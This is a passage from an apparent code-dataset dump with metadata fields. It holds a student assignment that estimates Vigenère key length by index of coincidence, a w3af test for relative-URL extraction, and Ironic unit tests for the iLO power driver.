    # loop passed 0..keylen-1.  Position 0 wrapped around to message[-1]
    # (a bogus substring anchored on the LAST letter) and the substring
    # for position keylen was never sampled at all.
    total = 0.0
    for position in range(1, keylen + 1):
        total += stringIC(getNthSubkeysLetters(position, keylen, ciphertext))
    return total / keylen
# *** Question - 4 *** #
def keylengthIC(ciphertext):
    # Rank candidate key lengths 1..20 (inclusive) by their average
    # subsequence index of coincidence and return the five most
    # promising lengths, best first.
    averages = {length: subseqIC(ciphertext, length)
                for length in range(1, 21)}
    # Sorting-by-value pattern adapted from stackoverflow:
    # https://stackoverflow.com/questions/613183/how-do-i-sort-a-dictionary-by-value
    ranked = sorted(averages.items(), key=lambda pair: pair[1], reverse=True)
    # Keep only the key lengths of the top five entries.
    return [length for length, _ in ranked[:5]]
# *** This function was introduced for Question - 2 *** #
# This function returns the count of the particular symbol in the message passed.
# Example: For getCount(A,'ABA') - it returns 2
# getCount(B,'ABA') - it returns 1
# getCount(A,'AABCHJASGFA') - it returns 4
def getCount(symbol,message):
    # Count how many characters of `message` equal `symbol`, e.g.
    #   getCount('A', 'ABA')         -> 2
    #   getCount('B', 'ABA')         -> 1
    #   getCount('A', 'AABCHJASGFA') -> 4
    # Per-character equality (NOT substring search), matching the
    # original explicit loop exactly.
    return sum(1 for character in message if character == symbol)
# Taken from vigenereHacker.py published on - inventwithpython.com/hacking
def getNthSubkeysLetters(n, keyLength, message):
    # Returns every keyLength-th letter of `message`, starting at the
    # n-th (1-based) position.  E.g.:
    #   getNthSubkeysLetters(1, 3, 'ABCABCABC') returns 'AAA'
    #   getNthSubkeysLetters(2, 3, 'ABCABCABC') returns 'BBB'
    #   getNthSubkeysLetters(3, 3, 'ABCABCABC') returns 'CCC'
    #   getNthSubkeysLetters(1, 5, 'ABCDEFGHI') returns 'AF'
    # (A range starting at n - 1 reproduces the original while-loop,
    # including its negative-index behaviour when n == 0.)
    return ''.join(message[index]
                   for index in range(n - 1, len(message), keyLength))
if __name__ == '__main__':
main()
|
# Assignment 7 - Question 2,3,4 (Combined)
# Submitted By: <NAME> & <NAME>
# 1479093 & 1505703
# The line of the code
# list1 = sorted(list1, key=lambda x: x[1],reverse = True) was taken from stackoverflow - https://stackoverflow.com/questions/613183/how-do-i-sort-a-dictionary-by-value
import math,sys,random
LETTERS = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'
def main():
    # Smoke test: print the IC and the ranked key lengths for a known
    # Vigenere ciphertext.
    sample = 'PPQCAXQVEKGYBNKMAZUHKNHONMFRAZCBELGRKUGDDMA'
    print(stringIC(sample))
    print(keylengthIC(sample))
# *** Question - 2 *** #
def stringIC(message):
    # Returns the index of coincidence for a string:
    #     IC = sum(c * (c - 1)) / (N * (N - 1))
    # where c is the count of each distinct symbol and N = len(message).
    from collections import Counter

    # Counting every distinct symbol once is O(N); the previous version
    # re-scanned the whole message for every character, which was O(N^2).
    counts = Counter(message)
    numerator = sum(c * (c - 1) for c in counts.values())
    denominator = len(message) * (len(message) - 1)
    return numerator / denominator
# *** Question - 3 *** #
def subseqIC(ciphertext, keylen):
    # Average index of coincidence over the keylen substrings built by
    # taking every keylen-th letter of the ciphertext.
    #
    # Fix: getNthSubkeysLetters() expects a 1-based position, but the old
    # loop passed 0..keylen-1.  Position 0 wrapped around to message[-1]
    # (a bogus substring anchored on the LAST letter) and the substring
    # for position keylen was never sampled at all.
    total = 0.0
    for position in range(1, keylen + 1):
        total += stringIC(getNthSubkeysLetters(position, keylen, ciphertext))
    return total / keylen
# *** Question - 4 *** #
def keylengthIC(ciphertext):
    # Rank candidate key lengths 1..20 (inclusive) by their average
    # subsequence index of coincidence and return the five most
    # promising lengths, best first.
    averages = {length: subseqIC(ciphertext, length)
                for length in range(1, 21)}
    # Sorting-by-value pattern adapted from stackoverflow:
    # https://stackoverflow.com/questions/613183/how-do-i-sort-a-dictionary-by-value
    ranked = sorted(averages.items(), key=lambda pair: pair[1], reverse=True)
    # Keep only the key lengths of the top five entries.
    return [length for length, _ in ranked[:5]]
# *** This function was introduced for Question - 2 *** #
# This function returns the count of the particular symbol in the message passed.
# Example: For getCount(A,'ABA') - it returns 2
# getCount(B,'ABA') - it returns 1
# getCount(A,'AABCHJASGFA') - it returns 4
def getCount(symbol,message):
    # Count how many characters of `message` equal `symbol`, e.g.
    #   getCount('A', 'ABA')         -> 2
    #   getCount('B', 'ABA')         -> 1
    #   getCount('A', 'AABCHJASGFA') -> 4
    # Per-character equality (NOT substring search), matching the
    # original explicit loop exactly.
    return sum(1 for character in message if character == symbol)
# Taken from vigenereHacker.py published on - inventwithpython.com/hacking
def getNthSubkeysLetters(n, keyLength, message):
    # Returns every keyLength-th letter of `message`, starting at the
    # n-th (1-based) position.  E.g.:
    #   getNthSubkeysLetters(1, 3, 'ABCABCABC') returns 'AAA'
    #   getNthSubkeysLetters(2, 3, 'ABCABCABC') returns 'BBB'
    #   getNthSubkeysLetters(3, 3, 'ABCABCABC') returns 'CCC'
    #   getNthSubkeysLetters(1, 5, 'ABCDEFGHI') returns 'AF'
    # (A range starting at n - 1 reproduces the original while-loop,
    # including its negative-index behaviour when n == 0.)
    return ''.join(message[index]
                   for index in range(n - 1, len(message), keyLength))
if __name__ == '__main__':
main()
|
en
| 0.722996
|
# Assignment 7 - Question 2,3,4 (Combined) # Submitted By: <NAME> & <NAME> # 1479093 & 1505703 # The line of the code # list1 = sorted(list1, key=lambda x: x[1],reverse = True) was taken from stackoverflow - https://stackoverflow.com/questions/613183/how-do-i-sort-a-dictionary-by-value # For testing purposes only # *** Question - 2 *** # # Returns the index of coincidence for a string # Empty dictionary for getting the count for all the letters # Getting count of every character in the message # getCount function returns the count of the particular letter in the message # Put that word with the count in the dictionary # Finding the actual IC # Numerator for the formula of IC # Denominator for the formula of IC # Return the desired value # *** Question - 3 *** # # Calculates the average index of coincidence for all substrings # in a vigenere encrypted string given a keylength # Get a substring (enciphered with a particular letter from the key) # increment count and record an IC for this substring # *** Question - 4 *** # # Empty dictionary - with keys as key-lengths and value as their corresponding result of subseqIC # Empty list of top 5 possible keys # For all possible key-lengths 1 - 20 (including) # Get the average # Entering the value in the dictionary # Make a list of the key and corresponding value in a tuple and append it to the list. # We converted it to the list to sort as we cannot sort the dictionary # The line below was taken from stackoverflow - https://stackoverflow.com/questions/613183/how-do-i-sort-a-dictionary-by-value # We did this to sort the list in descending order # Take the first 5 elements from the sorted list above and append it to the possibleKeys list. # Return the list with the top 5 possible keys # *** This function was introduced for Question - 2 *** # # This function returns the count of the particular symbol in the message passed. 
# Example: For getCount(A,'ABA') - it returns 2 # getCount(B,'ABA') - it returns 1 # getCount(A,'AABCHJASGFA') - it returns 4 # Taken from vigenereHacker.py published on - inventwithpython.com/hacking # Returns every Nth letter for each keyLength set of letters in text. # E.g. getNthSubkeysLetters(1, 3, 'ABCABCABC') returns 'AAA' # getNthSubkeysLetters(2, 3, 'ABCABCABC') returns 'BBB' # getNthSubkeysLetters(3, 3, 'ABCABCABC') returns 'CCC' # getNthSubkeysLetters(1, 5, 'ABCDEFGHI') returns 'AF'
| 3.918746
| 4
|
packages/w3af/w3af/core/data/parsers/utils/tests/test_re_extract.py
|
ZooAtmosphereGroup/HelloPackages
| 0
|
6628483
|
<filename>packages/w3af/w3af/core/data/parsers/utils/tests/test_re_extract.py<gh_stars>0
# -*- coding: utf-8 -*-
"""
test_re_extract.py
Copyright 2019 <NAME>
This file is part of w3af, http://w3af.org/ .
w3af is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation version 2 of the License.
w3af is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with w3af; if not, write to the Free Software
Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
"""
import unittest
from w3af.core.data.parsers.utils.re_extract import ReExtract
from w3af.core.data.parsers.doc.url import URL
class TestReExtract(unittest.TestCase):

    def test_relative_regex(self):
        # A "../../" reference found in free text must be resolved
        # against the document's base URL.
        base_url = URL('https://w3af.org/abc/def/')
        extractor = ReExtract('123 ../../foobar/uploads/foo.png 465',
                              base_url, 'utf-8')
        extractor.parse()
        self.assertEqual(extractor.get_references(),
                         [URL('https://w3af.org/foobar/uploads/foo.png')])
|
<filename>packages/w3af/w3af/core/data/parsers/utils/tests/test_re_extract.py<gh_stars>0
# -*- coding: utf-8 -*-
"""
test_re_extract.py
Copyright 2019 <NAME>
This file is part of w3af, http://w3af.org/ .
w3af is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation version 2 of the License.
w3af is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with w3af; if not, write to the Free Software
Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
"""
import unittest
from w3af.core.data.parsers.utils.re_extract import ReExtract
from w3af.core.data.parsers.doc.url import URL
class TestReExtract(unittest.TestCase):

    def test_relative_regex(self):
        # A "../../" reference found in free text must be resolved
        # against the document's base URL.
        base_url = URL('https://w3af.org/abc/def/')
        extractor = ReExtract('123 ../../foobar/uploads/foo.png 465',
                              base_url, 'utf-8')
        extractor.parse()
        self.assertEqual(extractor.get_references(),
                         [URL('https://w3af.org/foobar/uploads/foo.png')])
|
en
| 0.853346
|
# -*- coding: utf-8 -*- test_re_extract.py Copyright 2019 <NAME> This file is part of w3af, http://w3af.org/ . w3af is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation version 2 of the License. w3af is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with w3af; if not, write to the Free Software Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
| 2.155723
| 2
|
ironic/tests/unit/drivers/modules/ilo/test_power.py
|
mpardhi23/ironic
| 2
|
6628484
|
# Copyright 2014 Hewlett-Packard Development Company, L.P.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Test class for IloPower module."""
import mock
from oslo_config import cfg
from oslo_utils import importutils
from oslo_utils import uuidutils
from ironic.common import boot_devices
from ironic.common import exception
from ironic.common import states
from ironic.conductor import task_manager
from ironic.conductor import utils as manager_utils
from ironic.drivers.modules.ilo import common as ilo_common
from ironic.drivers.modules.ilo import power as ilo_power
from ironic.tests.unit.db import utils as db_utils
from ironic.tests.unit.drivers.modules.ilo import test_common
from ironic.tests.unit.objects import utils as obj_utils
ilo_error = importutils.try_import('proliantutils.exception')
INFO_DICT = db_utils.get_test_ilo_info()
CONF = cfg.CONF
@mock.patch.object(ilo_common, 'get_ilo_object', spec_set=True, autospec=True)
class IloPowerInternalMethodsTestCase(test_common.BaseIloTest):
    def setUp(self):
        """Create a test iLO node and shorten timeouts so tests run fast."""
        super(IloPowerInternalMethodsTestCase, self).setUp()
        self.node = obj_utils.create_test_node(
            self.context, driver='ilo', driver_info=INFO_DICT,
            instance_uuid=uuidutils.generate_uuid())
        # Keep the power-state polling loops short (1 second) so the
        # timeout-oriented tests below do not stall the suite.
        CONF.set_override('power_wait', 1, 'ilo')
        CONF.set_override('soft_power_off_timeout', 1, 'conductor')
def test__get_power_state(self, get_ilo_object_mock):
ilo_mock_object = get_ilo_object_mock.return_value
ilo_mock_object.get_host_power_status.return_value = 'ON'
self.assertEqual(
states.POWER_ON, ilo_power._get_power_state(self.node))
ilo_mock_object.get_host_power_status.return_value = 'OFF'
self.assertEqual(
states.POWER_OFF, ilo_power._get_power_state(self.node))
ilo_mock_object.get_host_power_status.return_value = 'ERROR'
self.assertEqual(states.ERROR, ilo_power._get_power_state(self.node))
def test__get_power_state_fail(self, get_ilo_object_mock):
ilo_mock_object = get_ilo_object_mock.return_value
exc = ilo_error.IloError('error')
ilo_mock_object.get_host_power_status.side_effect = exc
self.assertRaises(exception.IloOperationError,
ilo_power._get_power_state,
self.node)
ilo_mock_object.get_host_power_status.assert_called_once_with()
def test__set_power_state_invalid_state(self, get_ilo_object_mock):
with task_manager.acquire(self.context, self.node.uuid,
shared=True) as task:
self.assertRaises(exception.InvalidParameterValue,
ilo_power._set_power_state,
task,
states.ERROR)
def test__set_power_state_reboot_fail(self, get_ilo_object_mock):
ilo_mock_object = get_ilo_object_mock.return_value
exc = ilo_error.IloError('error')
ilo_mock_object.reset_server.side_effect = exc
with task_manager.acquire(self.context, self.node.uuid,
shared=True) as task:
self.assertRaises(exception.IloOperationError,
ilo_power._set_power_state,
task,
states.REBOOT)
ilo_mock_object.reset_server.assert_called_once_with()
@mock.patch.object(ilo_common, 'get_server_post_state', spec_set=True,
autospec=True)
def test__set_power_state_reboot_ok(self, get_post_mock,
get_ilo_object_mock):
ilo_mock_object = get_ilo_object_mock.return_value
get_post_mock.side_effect = (['FinishedPost', 'PowerOff',
'FinishedPost'])
with task_manager.acquire(self.context, self.node.uuid,
shared=True) as task:
ilo_power._set_power_state(task, states.REBOOT)
get_post_mock.assert_called_with(task.node)
ilo_mock_object.reset_server.assert_called_once_with()
@mock.patch.object(ilo_common, 'get_server_post_state', spec_set=True,
autospec=True)
def test__set_power_state_off_fail(self, get_post_mock,
get_ilo_object_mock):
ilo_mock_object = get_ilo_object_mock.return_value
get_post_mock.side_effect = (['FinishedPost', 'FinishedPost',
'FinishedPost', 'FinishedPost',
'FinishedPost'])
with task_manager.acquire(self.context, self.node.uuid,
shared=True) as task:
self.assertRaises(exception.PowerStateFailure,
ilo_power._set_power_state,
task,
states.POWER_OFF)
get_post_mock.assert_called_with(task.node)
ilo_mock_object.hold_pwr_btn.assert_called_once_with()
@mock.patch.object(ilo_common, 'get_server_post_state', spec_set=True,
autospec=True)
def test__set_power_state_on_ok(self, get_post_mock, get_ilo_object_mock):
ilo_mock_object = get_ilo_object_mock.return_value
get_post_mock.side_effect = ['PowerOff', 'PowerOff', 'FinishedPost']
target_state = states.POWER_ON
with task_manager.acquire(self.context, self.node.uuid,
shared=True) as task:
ilo_power._set_power_state(task, target_state)
get_post_mock.assert_called_with(task.node)
ilo_mock_object.set_host_power.assert_called_once_with('ON')
@mock.patch.object(ilo_power.LOG, 'info')
@mock.patch.object(ilo_power, '_attach_boot_iso_if_needed',
spec_set=True, autospec=True)
@mock.patch.object(ilo_common, 'get_server_post_state', spec_set=True,
autospec=True)
def test__set_power_state_soft_reboot_ok(
self, get_post_mock, attach_boot_iso_mock,
log_mock, get_ilo_object_mock):
CONF.set_override('power_wait', 1, 'ilo')
ilo_mock_object = get_ilo_object_mock.return_value
ilo_mock_object.get_host_power_status.return_value = 'ON'
get_post_mock.side_effect = (
['FinishedPost', 'FinishedPost', 'PowerOff', 'PowerOff', 'InPost',
'FinishedPost'])
with task_manager.acquire(self.context, self.node.uuid,
shared=True) as task:
ilo_power._set_power_state(task, states.SOFT_REBOOT, timeout=3)
get_post_mock.assert_called_with(task.node)
ilo_mock_object.press_pwr_btn.assert_called_once_with()
attach_boot_iso_mock.assert_called_once_with(task)
ilo_mock_object.set_host_power.assert_called_once_with('ON')
log_mock.assert_called_once_with(
"The node %(node_id)s operation of '%(state)s' "
"is completed in %(time_consumed)s seconds.",
{'state': 'soft rebooting', 'node_id': task.node.uuid,
'time_consumed': 2})
@mock.patch.object(ilo_power.LOG, 'info')
@mock.patch.object(ilo_power, '_attach_boot_iso_if_needed',
spec_set=True, autospec=True)
@mock.patch.object(ilo_common, 'get_server_post_state', spec_set=True,
autospec=True)
def test__set_power_state_soft_reboot_ok_initial_power_off(
self, get_post_mock, attach_boot_iso_mock,
log_mock, get_ilo_object_mock):
CONF.set_override('power_wait', 1, 'ilo')
ilo_mock_object = get_ilo_object_mock.return_value
ilo_mock_object.get_host_power_status.return_value = 'OFF'
get_post_mock.side_effect = ['FinishedPost', 'PowerOff',
'FinishedPost']
with task_manager.acquire(self.context, self.node.uuid,
shared=True) as task:
ilo_power._set_power_state(task, states.SOFT_REBOOT, timeout=3)
get_post_mock.assert_called_with(task.node)
attach_boot_iso_mock.assert_called_once_with(task)
ilo_mock_object.set_host_power.assert_called_once_with('ON')
log_mock.assert_called_once_with(
"The node %(node_id)s operation of '%(state)s' "
"is completed in %(time_consumed)s seconds.",
{'state': 'power on', 'node_id': task.node.uuid,
'time_consumed': 1})
@mock.patch.object(ilo_power.LOG, 'info')
@mock.patch.object(ilo_power, '_attach_boot_iso_if_needed',
spec_set=True, autospec=True)
@mock.patch.object(ilo_common, 'get_server_post_state', spec_set=True,
autospec=True)
def test__set_power_state_soft_reboot_fail_to_off(
self, get_post_mock, attach_boot_iso_mock,
log_mock, get_ilo_object_mock):
CONF.set_override('power_wait', 1, 'ilo')
exc = ilo_error.IloError('error')
ilo_mock_object = get_ilo_object_mock.return_value
ilo_mock_object.get_host_power_status.return_value = 'ON'
ilo_mock_object.press_pwr_btn.side_effect = exc
with task_manager.acquire(self.context, self.node.uuid,
shared=True) as task:
self.assertRaises(exception.IloOperationError,
ilo_power._set_power_state,
task, states.SOFT_REBOOT, timeout=3)
ilo_mock_object.press_pwr_btn.assert_called_once_with()
self.assertFalse(get_post_mock.called)
self.assertFalse(attach_boot_iso_mock.called)
self.assertFalse(log_mock.called)
@mock.patch.object(ilo_power.LOG, 'info')
@mock.patch.object(ilo_power, '_attach_boot_iso_if_needed',
spec_set=True, autospec=True)
@mock.patch.object(ilo_common, 'get_server_post_state', spec_set=True,
autospec=True)
def test__set_power_state_soft_reboot_fail_to_on(
self, get_post_mock, attach_boot_iso_mock,
log_mock, get_ilo_object_mock):
CONF.set_override('power_wait', 1, 'ilo')
exc = ilo_error.IloError('error')
ilo_mock_object = get_ilo_object_mock.return_value
ilo_mock_object.get_host_power_status.return_value = 'ON'
get_post_mock.side_effect = (
['FinishedPost', 'PowerOff', 'PowerOff', 'InPost',
'InPost', 'InPost', 'InPost', 'InPost'])
ilo_mock_object.press_pwr_btn.side_effect = [None, exc]
with task_manager.acquire(self.context, self.node.uuid,
shared=True) as task:
self.assertRaises(exception.PowerStateFailure,
ilo_power._set_power_state,
task, states.SOFT_REBOOT, timeout=3)
get_post_mock.assert_called_with(task.node)
ilo_mock_object.press_pwr_btn.assert_called_once_with()
ilo_mock_object.set_host_power.assert_called_once_with('ON')
attach_boot_iso_mock.assert_called_once_with(task)
self.assertFalse(log_mock.called)
@mock.patch.object(ilo_power.LOG, 'info')
@mock.patch.object(ilo_power, '_attach_boot_iso_if_needed',
spec_set=True, autospec=True)
@mock.patch.object(ilo_common, 'get_server_post_state', spec_set=True,
autospec=True)
def test__set_power_state_soft_reboot_timeout(
self, get_post_mock, attach_boot_iso_mock,
log_mock, get_ilo_object_mock):
CONF.set_override('power_wait', 1, 'ilo')
ilo_mock_object = get_ilo_object_mock.return_value
ilo_mock_object.get_host_power_status.return_value = 'ON'
get_post_mock.side_effect = ['FinishedPost', 'FinishedPost',
'PowerOff', 'InPost', 'InPost', 'InPost'
'InPost', 'InPost']
with task_manager.acquire(self.context, self.node.uuid,
shared=True) as task:
self.assertRaises(exception.PowerStateFailure,
ilo_power._set_power_state,
task, states.SOFT_REBOOT, timeout=2)
get_post_mock.assert_called_with(task.node)
ilo_mock_object.press_pwr_btn.assert_called_once_with()
ilo_mock_object.set_host_power.assert_called_once_with('ON')
attach_boot_iso_mock.assert_called_once_with(task)
self.assertFalse(log_mock.called)
    @mock.patch.object(ilo_power.LOG, 'info')
    @mock.patch.object(ilo_common, 'get_server_post_state', spec_set=True,
                       autospec=True)
    def test__set_power_state_soft_power_off_ok(
            self, get_post_mock, log_mock, get_ilo_object_mock):
        """A soft power off succeeds and logs the elapsed time."""
        CONF.set_override('power_wait', 1, 'ilo')
        ilo_mock_object = get_ilo_object_mock.return_value
        # NOTE(review): 'PowerOff' 'PowerOff' below concatenates into the
        # single string 'PowerOffPowerOff' (missing comma).  Fixing it would
        # change how many polls occur before the target state is seen and
        # break the time_consumed assertion -- confirm intended sequence
        # before changing.
        get_post_mock.side_effect = ['FinishedPost', 'FinishedPost', 'PowerOff'
                                     'PowerOff', 'PowerOff']
        with task_manager.acquire(self.context, self.node.uuid,
                                  shared=True) as task:
            ilo_power._set_power_state(task, states.SOFT_POWER_OFF, timeout=3)
            get_post_mock.assert_called_with(task.node)
        ilo_mock_object.press_pwr_btn.assert_called_once_with()
        log_mock.assert_called_once_with(
            "The node %(node_id)s operation of '%(state)s' "
            "is completed in %(time_consumed)s seconds.",
            {'state': 'soft power off', 'node_id': task.node.uuid,
             'time_consumed': 2})
@mock.patch.object(ilo_power.LOG, 'info')
@mock.patch.object(ilo_common, 'get_server_post_state', spec_set=True,
autospec=True)
def test__set_power_state_soft_power_off_fail(
self, get_post_mock, log_mock, get_ilo_object_mock):
CONF.set_override('power_wait', 1, 'ilo')
exc = ilo_error.IloError('error')
ilo_mock_object = get_ilo_object_mock.return_value
ilo_mock_object.get_host_power_status.return_value = 'ON'
ilo_mock_object.press_pwr_btn.side_effect = exc
with task_manager.acquire(self.context, self.node.uuid,
shared=True) as task:
self.assertRaises(exception.IloOperationError,
ilo_power._set_power_state,
task, states.SOFT_POWER_OFF, timeout=2)
ilo_mock_object.press_pwr_btn.assert_called_once_with()
self.assertFalse(get_post_mock.called)
self.assertFalse(log_mock.called)
@mock.patch.object(ilo_power.LOG, 'info')
@mock.patch.object(ilo_common, 'get_server_post_state', spec_set=True,
autospec=True)
def test__set_power_state_soft_power_off_timeout(
self, get_post_mock, log_mock, get_ilo_object_mock):
CONF.set_override('power_wait', 1, 'ilo')
ilo_mock_object = get_ilo_object_mock.return_value
ilo_mock_object.get_host_power_status.return_value = 'ON'
get_post_mock.side_effect = ['FinishedPost', 'InPost', 'InPost',
'InPost', 'InPost']
with task_manager.acquire(self.context, self.node.uuid,
shared=True) as task:
self.assertRaises(exception.PowerStateFailure,
ilo_power._set_power_state,
task, states.SOFT_POWER_OFF, timeout=2)
get_post_mock.assert_called_with(task.node)
ilo_mock_object.press_pwr_btn.assert_called_with()
self.assertFalse(log_mock.called)
@mock.patch.object(manager_utils, 'node_set_boot_device', spec_set=True,
autospec=True)
@mock.patch.object(ilo_common, 'setup_vmedia_for_boot', spec_set=True,
autospec=True)
def test__attach_boot_iso_if_needed(
self, setup_vmedia_mock, set_boot_device_mock,
get_ilo_object_mock):
with task_manager.acquire(self.context, self.node.uuid,
shared=True) as task:
task.node.provision_state = states.ACTIVE
task.node.instance_info['ilo_boot_iso'] = 'boot-iso'
ilo_power._attach_boot_iso_if_needed(task)
setup_vmedia_mock.assert_called_once_with(task, 'boot-iso')
set_boot_device_mock.assert_called_once_with(task,
boot_devices.CDROM)
@mock.patch.object(manager_utils, 'node_set_boot_device', spec_set=True,
autospec=True)
@mock.patch.object(ilo_common, 'setup_vmedia_for_boot', spec_set=True,
autospec=True)
def test__attach_boot_iso_if_needed_on_rebuild(
self, setup_vmedia_mock, set_boot_device_mock,
get_ilo_object_mock):
with task_manager.acquire(self.context, self.node.uuid,
shared=True) as task:
task.node.provision_state = states.DEPLOYING
task.node.instance_info['ilo_boot_iso'] = 'boot-iso'
ilo_power._attach_boot_iso_if_needed(task)
self.assertFalse(setup_vmedia_mock.called)
self.assertFalse(set_boot_device_mock.called)
class IloPowerTestCase(test_common.BaseIloTest):
    """Tests for the public interface of the iLO power driver."""

    def test_get_properties(self):
        # The power interface advertises the common iLO driver properties.
        expected = ilo_common.COMMON_PROPERTIES
        with task_manager.acquire(self.context, self.node.uuid,
                                  shared=True) as task:
            self.assertEqual(expected, task.driver.power.get_properties())

    @mock.patch.object(ilo_common, 'parse_driver_info', spec_set=True,
                       autospec=True)
    def test_validate(self, mock_drvinfo):
        # validate() simply delegates to ilo_common.parse_driver_info.
        with task_manager.acquire(self.context, self.node.uuid,
                                  shared=True) as task:
            task.driver.power.validate(task)
            mock_drvinfo.assert_called_once_with(task.node)

    @mock.patch.object(ilo_common, 'parse_driver_info', spec_set=True,
                       autospec=True)
    def test_validate_fail(self, mock_drvinfo):
        # Errors raised by parse_driver_info propagate unchanged.
        side_effect = exception.InvalidParameterValue("Invalid Input")
        mock_drvinfo.side_effect = side_effect
        with task_manager.acquire(self.context, self.node.uuid,
                                  shared=True) as task:
            self.assertRaises(exception.InvalidParameterValue,
                              task.driver.power.validate,
                              task)

    @mock.patch.object(ilo_power, '_get_power_state', spec_set=True,
                       autospec=True)
    def test_get_power_state(self, mock_get_power):
        # get_power_state() is a thin wrapper around _get_power_state.
        with task_manager.acquire(self.context, self.node.uuid,
                                  shared=True) as task:
            mock_get_power.return_value = states.POWER_ON
            self.assertEqual(states.POWER_ON,
                             task.driver.power.get_power_state(task))
            mock_get_power.assert_called_once_with(task.node)

    @mock.patch.object(ilo_power, '_set_power_state', spec_set=True,
                       autospec=True)
    def _test_set_power_state(self, mock_set_power, timeout=None):
        # Helper: set_power_state() must forward the timeout verbatim.
        mock_set_power.return_value = states.POWER_ON
        with task_manager.acquire(self.context, self.node.uuid,
                                  shared=False) as task:
            task.driver.power.set_power_state(task, states.POWER_ON,
                                              timeout=timeout)
        mock_set_power.assert_called_once_with(task, states.POWER_ON,
                                               timeout=timeout)

    def test_set_power_state_no_timeout(self):
        self._test_set_power_state(timeout=None)

    def test_set_power_state_timeout(self):
        self._test_set_power_state(timeout=13)

    @mock.patch.object(ilo_power, '_set_power_state', spec_set=True,
                       autospec=True)
    @mock.patch.object(ilo_power, '_get_power_state', spec_set=True,
                       autospec=True)
    def _test_reboot(
            self, mock_get_power, mock_set_power,
            timeout=None):
        # Helper: reboot() reads the current state then requests REBOOT,
        # forwarding the timeout verbatim.
        mock_get_power.return_value = states.POWER_ON
        with task_manager.acquire(self.context, self.node.uuid,
                                  shared=False) as task:
            task.driver.power.reboot(task, timeout=timeout)
            mock_get_power.assert_called_once_with(task.node)
            mock_set_power.assert_called_once_with(
                task, states.REBOOT, timeout=timeout)

    def test_reboot_no_timeout(self):
        self._test_reboot(timeout=None)

    def test_reboot_with_timeout(self):
        self._test_reboot(timeout=100)

    def test_get_supported_power_states(self):
        # All five hard/soft power actions must be advertised.
        with task_manager.acquire(self.context, self.node.uuid,
                                  shared=False) as task:
            expected = [states.POWER_OFF, states.POWER_ON, states.REBOOT,
                        states.SOFT_POWER_OFF, states.SOFT_REBOOT]
            self.assertEqual(
                sorted(expected),
                sorted(task.driver.power.
                       get_supported_power_states(task)))
|
# Copyright 2014 Hewlett-Packard Development Company, L.P.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Test class for IloPower module."""
import mock
from oslo_config import cfg
from oslo_utils import importutils
from oslo_utils import uuidutils
from ironic.common import boot_devices
from ironic.common import exception
from ironic.common import states
from ironic.conductor import task_manager
from ironic.conductor import utils as manager_utils
from ironic.drivers.modules.ilo import common as ilo_common
from ironic.drivers.modules.ilo import power as ilo_power
from ironic.tests.unit.db import utils as db_utils
from ironic.tests.unit.drivers.modules.ilo import test_common
from ironic.tests.unit.objects import utils as obj_utils
ilo_error = importutils.try_import('proliantutils.exception')
INFO_DICT = db_utils.get_test_ilo_info()
CONF = cfg.CONF
@mock.patch.object(ilo_common, 'get_ilo_object', spec_set=True, autospec=True)
class IloPowerInternalMethodsTestCase(test_common.BaseIloTest):
def setUp(self):
super(IloPowerInternalMethodsTestCase, self).setUp()
self.node = obj_utils.create_test_node(
self.context, driver='ilo', driver_info=INFO_DICT,
instance_uuid=uuidutils.generate_uuid())
CONF.set_override('power_wait', 1, 'ilo')
CONF.set_override('soft_power_off_timeout', 1, 'conductor')
def test__get_power_state(self, get_ilo_object_mock):
ilo_mock_object = get_ilo_object_mock.return_value
ilo_mock_object.get_host_power_status.return_value = 'ON'
self.assertEqual(
states.POWER_ON, ilo_power._get_power_state(self.node))
ilo_mock_object.get_host_power_status.return_value = 'OFF'
self.assertEqual(
states.POWER_OFF, ilo_power._get_power_state(self.node))
ilo_mock_object.get_host_power_status.return_value = 'ERROR'
self.assertEqual(states.ERROR, ilo_power._get_power_state(self.node))
def test__get_power_state_fail(self, get_ilo_object_mock):
ilo_mock_object = get_ilo_object_mock.return_value
exc = ilo_error.IloError('error')
ilo_mock_object.get_host_power_status.side_effect = exc
self.assertRaises(exception.IloOperationError,
ilo_power._get_power_state,
self.node)
ilo_mock_object.get_host_power_status.assert_called_once_with()
def test__set_power_state_invalid_state(self, get_ilo_object_mock):
with task_manager.acquire(self.context, self.node.uuid,
shared=True) as task:
self.assertRaises(exception.InvalidParameterValue,
ilo_power._set_power_state,
task,
states.ERROR)
def test__set_power_state_reboot_fail(self, get_ilo_object_mock):
ilo_mock_object = get_ilo_object_mock.return_value
exc = ilo_error.IloError('error')
ilo_mock_object.reset_server.side_effect = exc
with task_manager.acquire(self.context, self.node.uuid,
shared=True) as task:
self.assertRaises(exception.IloOperationError,
